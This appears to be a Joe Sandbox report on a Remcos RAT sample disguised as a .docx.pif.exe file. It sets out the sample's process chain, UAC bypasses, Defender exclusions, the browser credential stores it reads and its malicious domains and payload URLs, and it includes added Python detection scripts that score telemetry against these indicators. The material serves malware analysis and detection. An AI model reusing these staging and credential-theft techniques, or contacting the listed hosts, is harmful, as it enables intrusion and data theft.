Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 31_2_045C9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free 31_2_045C9190
Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | Code function: 0_2_0298B71C GetVersionExA 0_2_0298B71C
Source: C:\Users\Public\xkn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory strings (process names of security products): cmdagent.exe, quhlpsvc.exe, avgamsvr.exe, TMBMSRV.exe, Vsserv.exe, avgupsvc.exe, avgemc.exe, MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\gaban\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 31_2_0458BA12
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 31_2_0458BB30
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: \key3.db 31_2_0458BB30

Remote Access Functionality

Source: C:\Windows\SysWOW64\colorcpl.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.64218af.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.4580000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 31.2.colorcpl.exe.6420000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3694699773.000000000281F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: colorcpl.exe PID: 7688, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\gaban\logs.dat, type: DROPPED
Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: cmd.exe 31_2_0458569A
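The Remcos indicators in the two sections above (a mutex named Rmc-5MRRQ3 created by the injected colorcpl.exe, the dropped log store C:\ProgramData\gaban\logs.dat, unpacked code that references Chrome's Login Data and Firefox's key3.db, and the geoplugin.net/json.gp lookup that appears in the URL list below) translate directly into a host triage check. The Python below is an added example written for this page, not code from the report or from Joe Sandbox; it scores constructed per-process telemetry records. Generalising the mutex to any "Rmc-" prefix, adding key4.db and logins.json alongside key3.db, the record layout, and the two-indicator threshold are assumptions.

```python
"""Score per-process telemetry against the Remcos host indicators listed in the
report. Added example, not Joe Sandbox code; record layout and thresholds are
assumptions chosen for illustration."""
import ntpath
import re

# The report shows \Sessions\1\BaseNamedObjects\Rmc-5MRRQ3; matching any
# "Rmc-" prefix is an assumed generalisation.
REMCOS_MUTEX_RE = re.compile(r"^Rmc-[A-Za-z0-9]+$")
# Log store C:\ProgramData\<dir>\logs.dat ("gaban" is specific to this sample).
LOGS_DAT_RE = re.compile(r"^c:\\programdata\\[^\\]+\\logs\.dat$", re.I)
# Browser credential stores referenced by the unpacked code. key4.db and
# logins.json are added by assumption; the report names key3.db only.
CHROME_LOGIN_RE = re.compile(
    r"\\appdata\\local\\google\\chrome\\user data\\[^\\]+\\login data$", re.I)
FIREFOX_SECRET_RE = re.compile(
    r"\\appdata\\roaming\\mozilla\\firefox\\profiles\\.*\\(key3\.db|key4\.db|logins\.json)$", re.I)
# Geolocation lookup observed from colorcpl.exe in the report's URL list.
GEO_LOOKUP = "geoplugin.net/json.gp"
# Processes that legitimately read their own credential stores.
BROWSERS = {"chrome.exe", "firefox.exe"}


def mutex_name(full: str) -> str:
    """Strip the object-directory prefix: '...\\BaseNamedObjects\\Rmc-5MRRQ3' -> 'Rmc-5MRRQ3'."""
    return full.rsplit("\\", 1)[-1]


def remcos_indicators(proc: dict) -> list[str]:
    """Return the names of the indicators a process record matches."""
    hits = []
    if any(REMCOS_MUTEX_RE.match(mutex_name(m)) for m in proc.get("mutexes", ())):
        hits.append("remcos_mutex_prefix")
    if any(LOGS_DAT_RE.match(p) for p in proc.get("files_written", ())):
        hits.append("programdata_logs_dat")
    if ntpath.basename(proc["image"]).lower() not in BROWSERS:
        reads = proc.get("files_read", ())
        if any(CHROME_LOGIN_RE.search(p) for p in reads):
            hits.append("chrome_login_data_read")
        if any(FIREFOX_SECRET_RE.search(p) for p in reads):
            hits.append("firefox_secrets_read")
    if any(GEO_LOOKUP in u.lower() for u in proc.get("urls", ())):
        hits.append("geoplugin_lookup")
    return hits


def verdict(proc: dict) -> str:
    """A single indicator (a logs.dat under ProgramData, one geoplugin call) also
    occurs in benign software, so two or more are required before naming Remcos."""
    n = len(remcos_indicators(proc))
    return "remcos_likely" if n >= 2 else ("review" if n == 1 else "clean")


# Constructed telemetry modelled on the report; not sandbox output.
SAMPLE_PROCESSES = [
    {"image": r"C:\Windows\SysWOW64\colorcpl.exe", "pid": 7688,
     "mutexes": [r"\Sessions\1\BaseNamedObjects\Rmc-5MRRQ3"],
     "files_written": [r"C:\ProgramData\gaban\logs.dat"],
     "files_read": [r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
                    r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\k1x.default\key3.db"],
     "urls": ["http://geoplugin.net/json.gp"]},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pid": 4120,
     "files_read": [r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"]},
    {"image": r"C:\Windows\explorer.exe", "pid": 3044,
     "mutexes": [r"\Sessions\1\BaseNamedObjects\ShellDesktopSwitchEvent"],
     "files_written": [r"C:\ProgramData\SomeVendor\logs.dat"]},
]

if __name__ == "__main__":
    for p in SAMPLE_PROCESSES:
        print(ntpath.basename(p["image"]), p["pid"], verdict(p), remcos_indicators(p))
```

The browser exclusion matters: Chrome reading its own Login Data is normal, while a colour-management applet (colorcpl.exe) doing so is the injection signature this report documents. The explorer.exe record is there to show why the logs.dat path alone only earns "review".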
MITRE ATT&CK Matrix (tactics: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact). Only techniques with a signature hit are listed; the digits in parentheses are reproduced as they appear in the matrix cell.

Reconnaissance: none
Resource Development: Scripting (1)
Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (1); Native API (11); Shared Modules (1); Command and Scripting Interpreter (2); Service Execution (2)
Persistence: Scripting (1); DLL Side-Loading (1); Valid Accounts (1); Windows Service (1); Registry Run Keys / Startup Folder (1)
Privilege Escalation: Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Bypass User Account Control (1); Valid Accounts (1); Access Token Manipulation (11); Windows Service (1); Process Injection (522); Registry Run Keys / Startup Folder (1)
Defense Evasion: Disable or Modify Tools (211); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (12); Software Packing (2); Timestomp (1); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (431); Valid Accounts (1); Virtualization/Sandbox Evasion (141); Access Token Manipulation (11); Process Injection (522)
Credential Access: OS Credential Dumping (1); Input Capture (111); Credentials In Files (2)
Discovery: System Time Discovery (2); Account Discovery (1); System Service Discovery (1); System Network Connections Discovery (1); File and Directory Discovery (4); System Information Discovery (47); Security Software Discovery (361); Virtualization/Sandbox Evasion (141); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
Lateral Movement: none
Collection: Archive Collected Data (11); Input Capture (111); Clipboard Data (3)
Command and Control: Ingress Tool Transfer (12); Encrypted Channel (21); Remote Access Software (1); Non-Application Layer Protocol (2); Application Layer Protocol (113)
Exfiltration: none
Impact: System Shutdown/Reboot (1); Defacement (1)
Behavior Graph (ID: 1466663; Sample: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe; Start date: 03/07/2024; Architecture: WINDOWS; Score: 100)

Start
  DNS/IP: www.vipguyclassproject2024.space; wcmanagers.com; 198.187.3.20.in-addr.arpa
  Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 17 other signatures
  Started: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe; SystemSettingsAdminFlows.exe

#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
  Network: wcmanagers.com (108.170.55.202), port 443, local ports 49699 and 49700, SSASN2US, United States
  Dropped: C:\Users\Public\Libraries\drbdmeyP.pif (PE32); C:\Users\Public\Pyemdbrd.url (MS); C:\Users\Public\Libraries\Pyemdbrd (data)
  Signatures: Detected unpacking (creates a PE file in dynamic memory); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Drops PE files with a suspicious file extension; 7 other signatures
  Started: drbdmeyP.pif; colorcpl.exe; extrac32.exe

drbdmeyP.pif
  Dropped: C:\Users\user\AppData\Local\Temp\...\D2F8.bat (ASCII)
  Signatures: Detected unpacking (changes PE section rights)
  Started: cmd.exe

colorcpl.exe
  Dropped: C:\ProgramData\gaban\logs.dat (data)
  Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; 5 other signatures

extrac32.exe (started by the sample)
  Dropped: C:\Users\Public\Libraries\Pyemdbrd.PIF (PE32)
  Signatures: Drops PE files with a suspicious file extension

cmd.exe
  Signatures: Drops executables to the windows directory (C:\Windows) and starts them; Adds a directory exclusion to Windows Defender
  Started: alpha.exe; extrac32.exe; alpha.exe; 8 other processes

alpha.exe (started by cmd.exe)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: xkn.exe

extrac32.exe (started by cmd.exe)
  Dropped: C:\Users\Public\alpha.exe (PE32+)
  Signatures: Drops PE files to the user root directory; Drops or copies cmd.exe with a different name (likely to bypass HIPS)

8 other processes (started by cmd.exe)
  Started: extrac32.exe (dropped C:\Users\Public\xkn.exe, PE32+); extrac32.exe (dropped C:\Users\Public\ger.exe, PE32+); extrac32.exe (dropped C:\Windows \System32\per.exe, PE32+; note the trailing space in the "Windows " directory name); taskkill.exe

xkn.exe
  Signatures: Powershell is started from unusual location (likely to bypass HIPS); Adds a directory exclusion to Windows Defender; Reads the Security eventlog; Reads the System eventlog
  Started: alpha.exe

alpha.exe (started by xkn.exe)
  Signatures: Adds a directory exclusion to Windows Defender
  Started: ger.exe

ger.exe
  Signatures: UAC bypass detected (Fodhelper)
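Two staging patterns in the graph are cheap to detect from file-create telemetry: extrac32.exe, a signed Windows extraction tool, writing PE32+ files into C:\Users\Public, and a drop into "C:\Windows \System32\per.exe", whose second path component differs from the real Windows directory only by a trailing space. The Python below is an added example written for this page, not code from the report or from Joe Sandbox; it triages constructed Sysmon-like event records for both patterns. The event field names (event, image, target, parent), the trusted-directory list, the PE-like extension list and the single-entry LOLBin set are assumptions.

```python
"""Triage file-create / process-create events for two staging patterns seen in
the behavior graph: a mock trusted directory at the drive root
("C:\\Windows \\System32") and PE files dropped into C:\\Users\\Public by
extrac32.exe. Added example; the event layout and lists are assumptions."""
import ntpath
import re

# Directory names at the drive root that Windows auto-elevates from. A sibling
# whose name differs only by trailing whitespace is the mock-directory trick. (assumed)
TRUSTED_ROOT_DIRS = {"windows", "program files", "program files (x86)"}
# Extensions treated as executable code regardless of the file's claimed type. (assumed)
PE_LIKE_EXTS = {".exe", ".dll", ".pif", ".scr", ".com", ".sys"}
# Signed extraction tools that rarely emit PEs into user-writable directories. (assumed)
ARCHIVE_LOLBINS = {"extrac32.exe"}
PUBLIC_PREFIX = "c:\\users\\public\\"
DRIVE_RE = re.compile(r"^[a-z]:$", re.I)


def components(path: str) -> list[str]:
    """Split a Windows path on either separator, dropping empty components."""
    return [c for c in re.split(r"[\\/]+", path) if c]


def has_mock_trusted_root(path: str) -> bool:
    """True when the directory directly under the drive root is a trusted name
    plus trailing whitespace ('C:\\Windows \\System32\\x.exe'). The genuine
    'C:\\Windows\\...' and a nested 'C:\\Users\\Public\\Windows \\' are not flagged."""
    parts = components(path)
    if len(parts) < 2 or not DRIVE_RE.match(parts[0]):
        return False
    first = parts[1]
    return first != first.rstrip() and first.rstrip().lower() in TRUSTED_ROOT_DIRS


def is_pe_like(path: str) -> bool:
    return ntpath.splitext(path)[1].lower() in PE_LIKE_EXTS


def under_public(path: str) -> bool:
    return path.lower().startswith(PUBLIC_PREFIX)


def triage(events: list[dict]) -> list[tuple[str, str]]:
    """Return (rule, path) findings for a list of Sysmon-like event dicts."""
    findings = []
    for ev in events:
        # The mock directory is suspicious whether it is being written to or run from.
        for field in ("image", "target"):
            p = ev.get(field)
            if p and has_mock_trusted_root(p):
                findings.append(("mock_trusted_dir", p))
        if ev.get("event") == "FileCreate":
            target = ev["target"]
            writer = ntpath.basename(ev.get("image", "")).lower()
            if is_pe_like(target) and under_public(target):
                findings.append(("pe_drop_public", target))
            if is_pe_like(target) and writer in ARCHIVE_LOLBINS:
                findings.append(("lolbin_pe_drop", target))
    return findings


# Constructed sample events modelled on the behavior graph; not sandbox output.
SAMPLE_EVENTS = [
    {"event": "FileCreate", "image": r"C:\Windows\System32\extrac32.exe",
     "target": r"C:\Windows \System32\per.exe"},
    {"event": "FileCreate", "image": r"C:\Windows\System32\extrac32.exe",
     "target": r"C:\Users\Public\xkn.exe"},
    {"event": "FileCreate", "image": r"C:\Users\user\Desktop\sample.exe",
     "target": r"C:\Users\Public\Libraries\drbdmeyP.pif"},
    {"event": "FileCreate", "image": r"C:\Windows\System32\svchost.exe",
     "target": r"C:\Windows\System32\catroot2\edb.log"},
    {"event": "ProcessCreate", "image": r"C:\Windows \System32\per.exe",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for rule, path in triage(SAMPLE_EVENTS):
        print(f"{rule:18} {path}")
```

Restricting the whitespace check to the component directly under the drive root keeps the rule aligned with how the trick works (the fake directory has to sit beside the real one) and avoids flagging oddly named folders deeper in a user profile. The .pif extension is included because the report shows the loader using it for PE payloads.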

Source | Detection | Scanner | Label
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | 45% | ReversingLabs | Win32.Trojan.Zusy
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | 50% | Virustotal |
#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Pyemdbrd.PIF | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Pyemdbrd.PIF | 45% | ReversingLabs | Win32.Trojan.Zusy
C:\Users\Public\Libraries\Pyemdbrd.PIF | 50% | Virustotal |
C:\Users\Public\Libraries\drbdmeyP.pif | 3% | ReversingLabs |
C:\Users\Public\Libraries\drbdmeyP.pif | 0% | Virustotal |
C:\Users\Public\alpha.exe | 0% | ReversingLabs |
C:\Users\Public\alpha.exe | 0% | Virustotal |
C:\Users\Public\ger.exe | 0% | ReversingLabs |
C:\Users\Public\ger.exe | 0% | Virustotal |
C:\Users\Public\xkn.exe | 0% | ReversingLabs |
C:\Users\Public\xkn.exe | 0% | Virustotal |
C:\Windows \System32\per.exe | 3% | ReversingLabs |
C:\Windows \System32\per.exe | 0% | Virustotal |

No Antivirus matches

Source | Detection | Scanner | Label
wcmanagers.com | 0% | Virustotal |
198.187.3.20.in-addr.arpa | 1% | Virustotal |

Source | Detection | Scanner | Label
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | Avira URL Cloud | safe
https://wcmanagers.com/ | 0% | Avira URL Cloud | safe
https://wcmanagers.com/Er9/233_Pyemdbrdpps03 | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | Avira URL Cloud | safe
https://wcmanagers.com/Er9/233_Pyemdbrdpps | 0% | Avira URL Cloud | safe
http://www.pmail.com | 0% | Avira URL Cloud | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | Virustotal |
http://ocsp.sectigo.com0C | 0% | Avira URL Cloud | safe
https://login.windows.localP | 0% | Avira URL Cloud | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | Virustotal |
https://wcmanagers.com/ | 0% | Virustotal |
www.vipguyclassproject2024.space | 100% | Avira URL Cloud | malware
http://www.pmail.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
wcmanagers.com | 108.170.55.202 | true | true | | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | true | | unknown
www.vipguyclassproject2024.space | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://wcmanagers.com/Er9/233_Pyemdbrdpps | true | Avira URL Cloud: safe | unknown
www.vipguyclassproject2024.space | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation

http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown

http://geoplugin.net/json.gp | colorcpl.exe | false | URL Reputation: safe | unknown

https://wcmanagers.com/ | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.0000000000870000.00000004.00000020.00020000.00000000.sdmp | true | 0% Virustotal; Avira URL Cloud: safe | unknown

https://wcmanagers.com:443/Er9/233_PyemdbrdppsWz | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.000000000087A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

https://sectigo.com/CPS0 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://ocsp.sectigo.com0 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://geoplugin.net/json.gp/C | colorcpl.exe, 0000001F.00000002.3702973204.0000000004580000.00000040.00001000.00020000.00000000.sdmp; colorcpl.exe, 0000001F.00000002.3705302881.0000000006420000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

https://wcmanagers.com/Er9/233_Pyemdbrdpps03 | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1333260150.00000000007FE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown

http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown

https://aka.ms/pscore68 | xkn.exe, 00000016.00000002.1319214441.000001EC81CA1000.00000004.00000800.00020000.00000000.sdmp; xkn.exe, 00000016.00000002.1319214441.000001EC81C63000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | xkn.exe, 00000016.00000002.1319214441.000001EC81C41000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

http://www.pmail.com | #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe; #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1359129963.0000000026652000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1392779821.000000007FC80000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1359129963.00000000265F6000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1362819613.0000000027650000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp; 00000000.00000002.1335815868.0000000002326000.00000004.00001000.00020000.00000000.sdmp; 00000000.00000002.1362819613.00000000276AC000.00000004.00000020.00020000.00000000.sdmp; drbdmeyP.pif; drbdmeyP.pif, 00000003.00000001.1257794553.000000000043B000.00000040.00000001.00020000.00000000.sdmp; 00000003.00000002.1420295868.0000000000400000.00000040.00000400.00020000.00000000.sdmp; 00000003.00000001.1257794553.0000000000418000.00000040.00000001.00020000.00000000.sdmp; 00000003.00000000.1257373309.0000000000416000.00000002.00000001.01000000.00000005.sdmp; drbdmeyP.pif.0.dr | false
                • 0%, Virustotal, Browse
                • Avira URL Cloud: safe
                unknown
                http://ocsp.sectigo.com0C#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256656557.000000007EDC0000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000002.1390105592.000000007F280000.00000004.00001000.00020000.00000000.sdmp, #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe, 00000000.00000003.1256443567.000000007EE90000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://login.windows.localPSystemSettingsAdminFlows.exe, 00000028.00000002.3692868865.000002F388E38000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
IP: 108.170.55.202, Domain: wcmanagers.com, Country: United States, ASN: 20454, ASN Name: SSASN2US, Malicious: true
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1466663
                Start date and time:2024-07-03 08:55:56 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 11m 57s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:42
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:1
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe
                renamed because original name is a hash value
                Original Sample Name:-202471.docx.pif.exe
                Detection:MAL
                Classification:mal100.rans.troj.spyw.expl.evad.winEXE@53/21@51/1
                EGA Information:
                • Successful, ratio: 90%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 101
                • Number of non-executed functions: 180
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                • Exclude process from analysis (whitelisted): SystemSettings.exe, dllhost.exe, audiodg.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, cxcs.microsoft.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target xkn.exe, PID 4340 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Timeline (Time, Type, Description):
• 02:56:49, API Interceptor: 1x Sleep call for process: #U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.docx.pif.exe modified
• 04:49:56, API Interceptor: 3007371x Sleep call for process: colorcpl.exe modified
• 08:57:00, Autostart: Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Pyemdbrd C:\Users\Public\Pyemdbrd.url
• 08:57:09, Autostart: Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Pyemdbrd C:\Users\Public\Pyemdbrd.url
Match: 108.170.55.202 (Associated Sample Name / URL, Detection, Threat Name)
• Filename: Your file name without extension goes here.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: R9eF05c3nd.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: rQUOTATION.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: ORDEN DEL PROYECTO.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: J728NYumpJ.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: rInquiry.exe, Detection: malicious, Threat Name: AgentTesla, Discord Token Stealer
• Filename: NEW QUOTATION FOR ORDER.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: Confirmaci#U00f3n de cotizaci#U00f3n.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: Soluciones de energia Nanovec.exe, Detection: malicious, Threat Name: AgentTesla
• Filename: SS Bottmac Engineers Pvt. Ltd.pdf.exe, Detection: malicious, Threat Name: AgentTesla
                                    No context
Match: SSASN2US (Associated Sample Name / URL, Detection, Threat Name, Context)
